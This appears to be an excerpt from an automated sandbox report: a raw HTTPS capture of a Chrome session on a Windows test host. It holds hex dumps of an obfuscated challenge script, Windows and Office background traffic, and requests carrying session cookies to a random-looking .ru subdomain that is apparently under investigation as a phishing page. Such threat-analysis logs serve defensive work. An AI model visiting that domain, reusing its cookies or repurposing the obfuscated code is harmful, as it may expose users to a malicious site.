                                  2024-11-25 23:28:27 UTC1369INData Raw: 75 72 6e 20 69 3d 3d 68 7d 2c 27 65 4f 61 54 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4f 4e 65 70 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 44 72 58 6a 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 7a 6a 75 75 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 76 48 70 41 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 61 62 44 6b 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 69 37 28 31 37 35 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 38
                                  Data Ascii: urn i==h},'eOaTb':function(h,i){return h(i)},'ONepy':function(h,i){return h!=i},'DrXjw':function(h,i){return h*i},'zjuux':function(h,i){return h-i},'vHpAw':function(h,i){return h<i},'abDkp':function(h,i){return h+i}},e=String[i7(175)],f={'h':function(h,i8
                                  2024-11-25 23:28:27 UTC1369INData Raw: 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 61 28 34 34 36 29 5d 28 64 5b 69 61 28 31 34 39 38 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 50 7c 49 3c 3c 31 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 69 61 28 34 34 36 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 50 3d 44 5b 69 61 28 31 34 32 39 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 69 61 28 36 37 34 29 5d 28 31 36 2c 78 29 3b 49 3d 49 3c 3c 31 2e 34 37 7c 64 5b 69 61 28 31 30 30 33 29 5d 28 50 2c 31 29 2c 64 5b 69 61 28 31 31 37 39 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 61 28 34 34 36 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a
                                  Data Ascii: (j,1))?(J=0,H[ia(446)](d[ia(1498)](o,I)),I=0):J++,P>>=1,x++);}else{for(P=1,x=0;x<G;I=P|I<<1,j-1==J?(J=0,H[ia(446)](o(I)),I=0):J++,P=0,x++);for(P=D[ia(1429)](0),x=0;d[ia(674)](16,x);I=I<<1.47|d[ia(1003)](P,1),d[ia(1179)](J,j-1)?(J=0,H[ia(446)](o(I)),I=0):J
                                  2024-11-25 23:28:27 UTC1369INData Raw: 34 34 36 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 69 61 28 31 32 30 31 29 5d 28 4a 2c 6a 2d 31 29 29 7b 48 5b 69 61 28 34 34 36 29 5d 28 64 5b 69 61 28 34 30 31 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 69 61 28 34 38 38 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 62 29 7b 72 65 74 75 72 6e 20 69 62 3d 69 37 2c 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 62 28 32 31 39 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 63 29 7b 72 65 74 75 72 6e 20 69 63 3d 69 62 2c 68 5b 69 63 28 31 34 32 39 29 5d 28 69 29 7d 29 7d 2c
                                  Data Ascii: 446)](o(I)),I=0):J++,P>>=1,x++);for(;;)if(I<<=1,d[ia(1201)](J,j-1)){H[ia(446)](d[ia(401)](o,I));break}else J++;return H[ia(488)]('')},'j':function(h,ib){return ib=i7,null==h?'':h==''?null:f.i(h[ib(219)],32768,function(i,ic){return ic=ib,h[ic(1429)](i)})},
                                  2024-11-25 23:28:27 UTC1369INData Raw: 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 69 64 28 33 33 34 29 5d 28 4d 2c 42 29 29 4d 3d 45 2b 45 5b 69 64 28 33 33 37 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 69 64 28 34 34 36 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 69 64 28 34 30 38 29 5d 28 45 2c 4d 5b 69 64 28 33 33 37 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4d 2c 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 69 64 28 37 38 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 69 37 28 32 35 33 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 31 34 37 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 65 2c 64 2c 65 2c 66 2c 67 29 7b 69 65 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 65 28 31 32 36 32 29 5d 3d 69 65 28 31 35 30 31 29 2c
                                  Data Ascii: s[M])M=s[M];else if(d[id(334)](M,B))M=E+E[id(337)](0);else return null;D[id(446)](M),s[B++]=d[id(408)](E,M[id(337)](0)),x--,E=M,x==0&&(x=Math[id(782)](2,C),C++)}}},g={},g[i7(253)]=f.h,g}(),eM[gJ(1476)]=function(ie,d,e,f,g){ie=gJ,d={},d[ie(1262)]=ie(1501),
                                  2024-11-25 23:28:27 UTC1369INData Raw: 33 27 3a 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 6b 5b 69 68 28 31 31 36 31 29 5d 28 67 5b 69 68 28 31 39 36 29 5d 2c 45 72 72 6f 72 29 3f 67 5b 69 68 28 31 39 36 29 5d 3d 4a 53 4f 4e 5b 69 68 28 32 35 36 29 5d 28 67 5b 69 68 28 31 39 36 29 5d 2c 4f 62 6a 65 63 74 5b 69 68 28 31 31 31 32 29 5d 28 67 5b 69 68 28 31 39 36 29 5d 29 29 3a 67 5b 69 68 28 31 39 36 29 5d 3d 4a 53 4f 4e 5b 69 68 28 32 35 36 29 5d 28 67 5b 69 68 28 31 39 36 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 73 3d 69 68 28 36 37 37 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 69 68 28 31 32 31 35 29 5d 3d 67 2c 78 5b 69 68 28 38 35 34 29 5d 3d 45 2c 78 2e 63 63 3d 68 2c 78 5b 69
                                  Data Ascii: 3':if(!n)return;continue;case'4':k[ih(1161)](g[ih(196)],Error)?g[ih(196)]=JSON[ih(256)](g[ih(196)],Object[ih(1112)](g[ih(196)])):g[ih(196)]=JSON[ih(256)](g[ih(196)]);continue;case'5':s=ih(677);continue;case'6':B=(x={},x[ih(1215)]=g,x[ih(854)]=E,x.cc=h,x[i


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.449754104.18.94.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:27 UTC742OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:27 UTC240INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:27 GMT
                                  Content-Type: image/png
                                  Content-Length: 61
                                  Connection: close
                                  cache-control: max-age=2629800, public
                                  Server: cloudflare
                                  CF-RAY: 8e856a4adf53423b-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-11-25 23:28:27 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.449752172.202.163.200443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Wb5MDaLXKmrWLk9&MD=h3V7Md7x HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                  Host: slscr.update.microsoft.com
                                  2024-11-25 23:28:28 UTC560INHTTP/1.1 200 OK
                                  Cache-Control: no-cache
                                  Pragma: no-cache
                                  Content-Type: application/octet-stream
                                  Expires: -1
                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                  MS-CorrelationId: 8a017e92-9ab8-485f-b1f5-3e9da582c592
                                  MS-RequestId: cfd93a84-3e8e-46fd-a6c6-fc9117bde0d4
                                  MS-CV: ICntfVlXXEeKCaRo.0
                                  X-Microsoft-SLSClientCache: 2880
                                  Content-Disposition: attachment; filename=environment.cab
                                  X-Content-Type-Options: nosniff
                                  Date: Mon, 25 Nov 2024 23:28:27 GMT
                                  Connection: close
                                  Content-Length: 24490
                                  2024-11-25 23:28:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                  2024-11-25 23:28:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.449756104.18.94.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:28 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:29 UTC240INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:29 GMT
                                  Content-Type: image/png
                                  Content-Length: 61
                                  Connection: close
                                  cache-control: max-age=2629800, public
                                  Server: cloudflare
                                  CF-RAY: 8e856a55585541fb-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-11-25 23:28:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.449760172.67.211.544432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:30 UTC1320OUTGET /favicon.ico HTTP/1.1
                                  Host: 8a6b7.qvzjymmm.ru
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://8a6b7.qvzjymmm.ru/O3YCEI/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Cookie: XSRF-TOKEN=eyJpdiI6ImgyWmdXNHpUYWZIRmo0YXNId1paT3c9PSIsInZhbHVlIjoiMldPai9UVzZ6cEZrUTBzbC9zNWhsUHFOYnlCelZVaFh5SHQ2amdEaTl2ckI5UjN6N1JveGk3S1k4TEpURTlQZDlrbW9tMG1LVXVRc3c4VVk4SGVKVHcxc2RLQUNML2ZuM0Qyb1pscWNyWG9YWW4yUG5Gbjk0em9OVVFZYzNhMWUiLCJtYWMiOiIzZGY5YjRlMWU2Njc4MjY1MTk2YTNhNmZiMDhhNTQ0ZDkzMzdiNmMxYzk2Y2M3N2ExYjcwN2I0MzI0MzlkNGY3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImovN0xuNkFsMkpTRTl6OGpTVGhOeEE9PSIsInZhbHVlIjoidFAwc2FBYkwvbStLYlZHNnM2dlBRRUhyZG5RMnQ3bTdQVHJjV1Y3NVFrNWZDczI2WkhMVDFDMzlPWWJqcndWREpiMFBVNmE0eDlnVE9sL0t6cHE1aWJ0cFhEZVA0RmY0V0tVejRmMHp2a3IxaWJlcUV6Q2lpY2RKNnZld3JtNnMiLCJtYWMiOiI5ODY0ZDRkMzgxMGI4MjIwZmIwMjE0OWMyOGU2NDA1NThmNDM4MjIyMTgyNzgzYjJjMWFjZjgzYzgzYzEyMDZkIiwidGFnIjoiIn0%3D
                                  2024-11-25 23:28:30 UTC1020INHTTP/1.1 404 Not Found
                                  Date: Mon, 25 Nov 2024 23:28:30 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: max-age=14400
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDyR3UugMIPZBBdjiZCp27D1MB6wJKntsvCtd2gloxygBtZ4%2B8QiNnqm%2FR9vPa3NxIPu7Val3YvXJ2%2FrNgARTV%2FShN65%2FiVllE8TUoFKf2iEhLSkTu3PKjUmwTHF6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=5368&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2290&delivery_rate=521420&cwnd=219&unsent_bytes=0&cid=7f7179ead2d3831f&ts=167&x=0"
                                  CF-Cache-Status: HIT
                                  Age: 6104
                                  Server: cloudflare
                                  CF-RAY: 8e856a5f0f9542db-EWR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1774&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1898&delivery_rate=1609702&cwnd=231&unsent_bytes=0&cid=2f9893acc95bcefb&ts=474&x=0"
                                  2024-11-25 23:28:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.44976235.190.80.14432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:32 UTC540OUTOPTIONS /report/v4?s=tDyR3UugMIPZBBdjiZCp27D1MB6wJKntsvCtd2gloxygBtZ4%2B8QiNnqm%2FR9vPa3NxIPu7Val3YvXJ2%2FrNgARTV%2FShN65%2FiVllE8TUoFKf2iEhLSkTu3PKjUmwTHF6Q%3D%3D HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Origin: https://8a6b7.qvzjymmm.ru
                                  Access-Control-Request-Method: POST
                                  Access-Control-Request-Headers: content-type
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:32 UTC336INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  access-control-max-age: 86400
                                  access-control-allow-methods: OPTIONS, POST
                                  access-control-allow-origin: *
                                  access-control-allow-headers: content-length, content-type
                                  date: Mon, 25 Nov 2024 23:28:32 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.44976435.190.80.14432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:33 UTC480OUTPOST /report/v4?s=tDyR3UugMIPZBBdjiZCp27D1MB6wJKntsvCtd2gloxygBtZ4%2B8QiNnqm%2FR9vPa3NxIPu7Val3YvXJ2%2FrNgARTV%2FShN65%2FiVllE8TUoFKf2iEhLSkTu3PKjUmwTHF6Q%3D%3D HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Content-Length: 432
                                  Content-Type: application/reports+json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:33 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 30 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 38 61 36 62 37 2e 71 76 7a 6a 79 6d 6d 6d 2e 72 75 2f 4f 33 59 43 45 49 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 31 2e 35 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                  Data Ascii: [{"age":0,"body":{"elapsed_time":3005,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://8a6b7.qvzjymmm.ru/O3YCEI/","sampling_fraction":1.0,"server_ip":"172.67.211.54","status_code":404,"type":"http.error"},"type":"network-erro
                                  2024-11-25 23:28:34 UTC168INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  date: Mon, 25 Nov 2024 23:28:33 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  18192.168.2.44976513.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:08 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:08 UTC492INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:08 GMT
                                  Content-Type: text/plain
                                  Content-Length: 218853
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public
                                  Last-Modified: Mon, 25 Nov 2024 13:17:46 GMT
                                  ETag: "0x8DD0D538D5EA1E0"
                                  x-ms-request-id: f5f75198-101e-00a2-8091-3f9f2e000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232908Z-174f7845968vqt9xhC1EWRgten0000000uhg0000000008xs
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:08 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                  2024-11-25 23:29:08 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                  Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                  2024-11-25 23:29:08 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                  Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
